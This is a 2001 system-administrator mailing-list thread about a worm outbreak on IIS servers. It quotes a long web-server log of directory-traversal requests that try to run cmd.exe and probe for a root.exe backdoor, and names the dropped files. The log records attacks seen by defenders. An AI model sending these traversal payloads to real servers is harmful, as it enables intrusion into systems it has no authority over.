RE: WARNING: Hacker Alert

Tue, 18 Sep 2001 13:13:42 -0700

Title: RE: WARNING: Hacker Alert

I've managed to search and destroy all readme.eml
root.exe
readme.exe
admin.dll (56K file shown as an audio xwave type file)
all on several servers.  All "seem ok for now" but my PDC/Exchange Server is still re-generating these files onto itself; the rest of servers seem ok except for that PDC.  There's no official word out yet from Symantec for a fix so we're scrambling around in the coolroom, going through a To-Do checklist.  Meantime, users here are still browsing the internet probably propagating the virus back into our network.....we're shutting down servers that seem to re-spawn those readme.eml files until Norton et all gives the official word.  Hang in there!

-----Original Message-----
From: Mark Kelsay [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:03 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


Anyone posting fixes for this once you are infected?  I have looked but have
yet to find any.  I am running Norton Corporate Edition 7.5.

Mark

-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert


All my public facing web servers at home and at my office have shown a huge
continuous hacking activity. Has anyone seen similar? I fear this may be
code red related or automated. Please comment if you have seen similar. Here
is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0,
500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604,
404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir, 63.101.9.107,
-, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0,
98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0,
500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107,
-, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01,
10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01,
10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET,
/mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70,
604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02,
W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0,
500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41,
13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01,
10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET,
/scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604,
404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01,
10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:28,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01,
10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0,
500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604,
404, 3, GET, /scripts/root.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:37,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0,
80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:38,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0,
500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01,
10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0, GET,
/mpf-flow/flow/login.cfm, -, 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Reply via email to